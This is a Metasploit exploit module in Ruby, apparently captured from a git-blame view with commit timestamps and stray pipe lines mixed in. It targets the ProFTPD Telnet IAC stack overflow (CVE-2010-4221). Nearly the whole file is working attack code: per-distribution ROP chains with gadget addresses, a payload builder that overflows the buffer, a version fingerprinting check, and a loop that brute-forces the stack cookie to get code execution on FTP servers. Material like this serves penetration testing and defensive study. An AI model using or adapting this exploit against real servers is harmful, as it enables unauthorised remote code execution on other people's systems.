2010-11-05 21:41:37 +00:00
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##
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2013-10-15 18:50:46 +00:00
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# This module requires Metasploit: http//metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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2010-11-05 21:41:37 +00:00
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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2013-08-30 21:28:54 +00:00
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Rank = GreatRanking
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#include Msf::Exploit::Remote::Ftp
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include Msf::Exploit::Remote::Tcp
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
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'Description' => %q{
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This module exploits a stack-based buffer overflow in versions of ProFTPD
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server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
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large number of Telnet IAC commands, an attacker can corrupt memory and
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execute arbitrary code.
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The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
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transfer the flow of execution to a pool buffer (the cmd_rec "res" in
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"pr_cmd_read").
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The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub
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to it, and execute the stub. The stub then copies the remainder of the payload
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in and executes it.
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NOTE: Most Linux distributions either do not ship a vulnerable version of
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ProFTPD, or they ship a version compiled with stack smashing protection.
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Although SSP significantly reduces the probability of a single attempt
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succeeding, it will not prevent exploitation. Since the daemon forks in a
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default configuration, the cookie value will remain the same despite
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some attemtps failing. By making repeated requests, an attacker can eventually
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guess the cookie value and exploit the vulnerability.
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The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
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and could allow exploitation in semi-reasonable amount of time.
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},
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'Author' => [ 'jduck' ],
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'References' =>
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[
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['CVE', '2010-4221'],
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['OSVDB', '68985'],
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['BID', '44562']
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],
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'DefaultOptions' =>
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{
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'EXITFUNC' => 'process',
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'PrependChrootBreak' => true
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},
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'Privileged' => true,
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'Payload' =>
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{
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'Space' => 4096,
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# NOTE: \xff are avoided here so we can control the number of them being sent.
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'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff",
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'DisableNops' => 'True',
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},
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'Platform' => [ 'linux' ],
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'Targets' =>
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[
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#
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# Automatic targeting via fingerprinting
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#
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[ 'Automatic Targeting', { 'auto' => true } ],
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#
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# This special one comes first since we dont want its index changing.
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#
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[ 'Debug',
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{
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'IACCount' => 8192, # should cause crash writing off end of stack
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'Offset' => 0,
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'Ret' => 0x41414242,
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'Writable' => 0x43434545
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}
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],
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#
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# specific targets
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#
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# NOTE: this minimal rop works most of the time, but it can fail
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# if the proftpd pool memory is in a different order for whatever reason...
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[ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
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{
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'IACCount' => 4096+16,
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'Offset' => 0x102c-4,
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# NOTE: All addresses are from the proftpd binary
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'Ret' => 0x805a547, # pop esi / pop ebp / ret
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'Writable' => 0x80e81a0, # .data
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'RopStack' =>
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[
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# Writable is here
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0xcccccccc, # unused
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0x805a544, # mov eax,esi / pop ebx / pop esi / pop ebp / ret
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0xcccccccc, # becomes ebx
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0xcccccccc, # becomes esi
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0xcccccccc, # becomes ebp
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# quadruple deref the res pointer :)
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0x8068886, # mov eax,[eax] / ret
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0x8068886, # mov eax,[eax] / ret
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0x8068886, # mov eax,[eax] / ret
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0x8068886, # mov eax,[eax] / ret
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# skip the pool chunk header
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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# execute the data :)
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0x0805c26c, # jmp eax
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],
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}
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],
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# For the version compiled with symbols :)
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[ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
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{
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'IACCount' => 4096+16,
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'Offset' => 0x1028-4,
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# NOTE: All addresses are from the proftpd binary
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'Writable' => 0x80ec570, # .data
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'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
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'RopStack' =>
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[
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# Writable is here
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#0x0808162a, # jmp esp (works w/esp fixup)
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0xcccccccc, # unused becomes ebp
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0x80d78c2, # mov eax,esi / pop esi / pop ebp / ret
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0xcccccccc, # unused becomes esi
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0xcccccccc, # unused becomes ebp
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# quadruple deref the res pointer :)
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused becomes ebp
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused becomes ebp
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused becomes ebp
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused becomes ebp
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# skip the pool chunk header
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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# execute the data :)
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0x08058de6, # jmp eax
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],
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}
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],
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[ 'ProFTPD 1.3.2c Server (Ubuntu 10.04)',
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{
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'IACCount' => 1018,
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'Offset' => 0x420,
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'CookieOffset' => -0x20,
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'Writable' => 0x80db3a0, # becomes esi (beginning of .data)
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'Ret' => 0x805389b, # pop esi / pop ebp / ret
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'RopStack' =>
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[
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0xcccccccc, # becomes ebp
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0x8080f04, # pop eax / ret
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0x80db330, # becomes eax (GOT of mmap64)
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0x806a716, # mov eax, [eax] / ret
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0x805dd5c, # jmp eax
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0x80607b2, # add esp, 0x24 / pop ebx / pop ebp / ret
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# mmap args
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0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
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0, # unused
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0xcccccccc, # unused
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0xcccccccc, # unused
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0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
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0xcccccccc, # becomes ebp
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# note, ebx gets fixed above :)
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# 0xfe in 'ah' doesn't matter since we have more than enough space.
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# now, load an instruction to store to eax
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0x808b542, # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
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# becomes edx - mov [eax+ebp*4]; ebx / ret
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"\x89\x1c\xa8\xc3".unpack('V').first,
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# store it :)
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0x805c2d0, # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
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0xcccccccc, # unused
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0xcccccccc, # unused
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0xcccccccc, # unused
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0xcccccccc, # unused
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0xcccccccc, # becomes ebx
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0xcccccccc, # becomes esi
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0xcccccccc, # becomes ebp
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# Copy the following stub:
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#"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
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#"\x8d\x78\x12" # lea edi, [eax+0x12]
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#"\x6a\x7f" # push 0x7f
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#"\x59" # pop ecx
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#"\xf2\xa5" # rep movsd
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0x80607b5, # pop ebx / pop ebp / ret
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0xfb2124b4, # becomes ebx
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1, # becomes ebp
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0x805dd5c, # jmp eax
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0x80607b5, # pop ebx / pop ebp / ret
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0x788dffff, # becomes ebx
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2, # becomes ebp
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0x805dd5c, # jmp eax
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0x80607b5, # pop ebx / pop ebp / ret
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0x597f6a12, # becomes ebx
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3, # becomes ebp
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0x805dd5c, # jmp eax
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0x80607b5, # pop ebx / pop ebp / ret
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0x9090a5f2, # becomes ebx
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4, # becomes ebp
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0x805dd5c, # jmp eax
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0x80607b5, # pop ebx / pop ebp / ret
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0x8d909090, # becomes ebx
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0, # becomes ebp
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0x805dd5c, # jmp eax
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# hopefully we dont get here
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0xcccccccc,
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],
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}
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]
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Nov 1 2010'))
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register_options(
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[
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Opt::RPORT(21),
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], self.class )
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end
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def check
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# NOTE: We don't care if the login failed here...
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ret = connect
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banner = sock.get_once || ''
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# We just want the banner to check against our targets..
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2014-01-22 17:20:10 +00:00
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vprint_status("FTP Banner: #{banner.strip}")
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2013-08-30 21:28:54 +00:00
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status = CheckCode::Safe
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if banner =~ /ProFTPD (1\.3\.[23][^ ])/i
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ver = $1
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maj,min,rel = ver.split('.')
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relv = rel.slice!(0,1)
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case relv
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when '2'
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if rel.length > 0
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if rel[0,2] == 'rc'
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if rel[2,rel.length].to_i >= 3
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status = CheckCode::Vulnerable
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end
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else
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status = CheckCode::Vulnerable
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end
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end
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when '3'
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# 1.3.3+ defaults to vulnerable (until >= 1.3.3c)
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status = CheckCode::Vulnerable
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if rel.length > 0
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if rel[0,2] != 'rc' and rel[0,1] > 'b'
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status = CheckCode::Safe
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end
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end
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end
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end
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disconnect
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return status
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end
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def exploit
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connect
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banner = sock.get_once || ''
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# Use a copy of the target
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mytarget = target
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if (target['auto'])
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mytarget = nil
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print_status("Automatically detecting the target...")
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if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then
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print_status("FTP Banner: #{banner.strip}")
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version = m[1]
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else
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fail_with(Failure::NoTarget, "No matching target")
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end
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regexp = Regexp.escape(version)
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self.targets.each do |t|
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if (t.name =~ /#{regexp}/) then
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mytarget = t
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break
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end
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end
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if (not mytarget)
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fail_with(Failure::NoTarget, "No matching target")
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end
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print_status("Selected Target: #{mytarget.name}")
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else
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print_status("Trying target #{mytarget.name}...")
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if banner
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print_status("FTP Banner: #{banner.strip}")
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end
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end
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#puts "attach and press any key"; bleh = $stdin.gets
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|
|
|
|
|
|
|
buf = ''
|
|
|
|
buf << 'SITE '
|
|
|
|
|
|
|
|
#buf << "\xcc"
|
|
|
|
if mytarget['CookieOffset']
|
|
|
|
buf << "\x8d\xa0\xfc\xdf\xff\xff" # lea esp, [eax-0x2004]
|
|
|
|
end
|
|
|
|
buf << payload.encoded
|
|
|
|
|
|
|
|
# The number of characters left must be odd at this point.
|
|
|
|
buf << rand_text(1) if (buf.length % 2) == 0
|
|
|
|
buf << "\xff" * (mytarget['IACCount'] - payload.encoded.length)
|
|
|
|
|
|
|
|
buf << rand_text_alphanumeric(mytarget['Offset'] - buf.length)
|
|
|
|
|
|
|
|
addrs = [
|
|
|
|
mytarget['Ret'],
|
|
|
|
mytarget['Writable']
|
|
|
|
].pack('V*')
|
|
|
|
|
|
|
|
if mytarget['RopStack']
|
|
|
|
addrs << mytarget['RopStack'].map { |e|
|
|
|
|
if e == 0xcccccccc
|
|
|
|
rand_text(4).unpack('V').first
|
|
|
|
else
|
|
|
|
e
|
|
|
|
end
|
|
|
|
}.pack('V*')
|
|
|
|
end
|
|
|
|
|
|
|
|
# Make sure we didn't introduce instability
|
|
|
|
addr_badchars = "\x09\x0a\x0b\x0c\x20"
|
|
|
|
if idx = Rex::Text.badchar_index(addrs, addr_badchars)
|
|
|
|
fail_with(Failure::Unknown, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx]))
|
|
|
|
end
|
|
|
|
|
|
|
|
buf << addrs
|
|
|
|
buf << "\r\n"
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# In the case of Ubuntu, the cookie has 24-bits of entropy. Further more, it
|
|
|
|
# doesn't change while proftpd forks children. Therefore, we can try forever
|
|
|
|
# and eventually guess it correctly.
|
|
|
|
#
|
|
|
|
# NOTE: if the cookie contains one of our bad characters, we're SOL.
|
|
|
|
#
|
|
|
|
if mytarget['CookieOffset']
|
|
|
|
print_status("!!! Attempting to bruteforce the cookie value! This can takes days. !!!")
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
max = 0xffffff00
|
|
|
|
off = mytarget['Offset'] + mytarget['CookieOffset']
|
|
|
|
|
|
|
|
cookie = last_cookie = 0
|
|
|
|
#cookie = 0x17ccd600
|
|
|
|
|
|
|
|
start = Time.now
|
|
|
|
last = start - 10
|
|
|
|
|
|
|
|
while not session_created?
|
|
|
|
now = Time.now
|
|
|
|
if (now - last) >= 10
|
|
|
|
perc = (cookie * 100) / max
|
|
|
|
qps = ((cookie - last_cookie) >> 8) / 10.0
|
|
|
|
print_status("%.2f%% complete, %.2f attempts/sec - Trying: 0x%x" % [perc, qps, cookie])
|
|
|
|
last = now
|
|
|
|
last_cookie = cookie
|
|
|
|
end
|
|
|
|
|
|
|
|
sd = connect(false)
|
|
|
|
sd.get_once
|
|
|
|
buf[off, 4] = [cookie].pack('V')
|
|
|
|
sd.put(buf)
|
|
|
|
disconnect(sd)
|
|
|
|
|
|
|
|
cookie += 0x100
|
|
|
|
break if cookie > max
|
|
|
|
end
|
|
|
|
|
|
|
|
if not session_created?
|
|
|
|
fail_with(Failure::Unknown, "Unable to guess the cookie value, sorry :-/")
|
|
|
|
end
|
|
|
|
else
|
|
|
|
sock.put(buf)
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
|
|
|
handler
|
|
|
|
end
|
2010-11-05 21:41:37 +00:00
|
|
|
|
|
|
|
end
|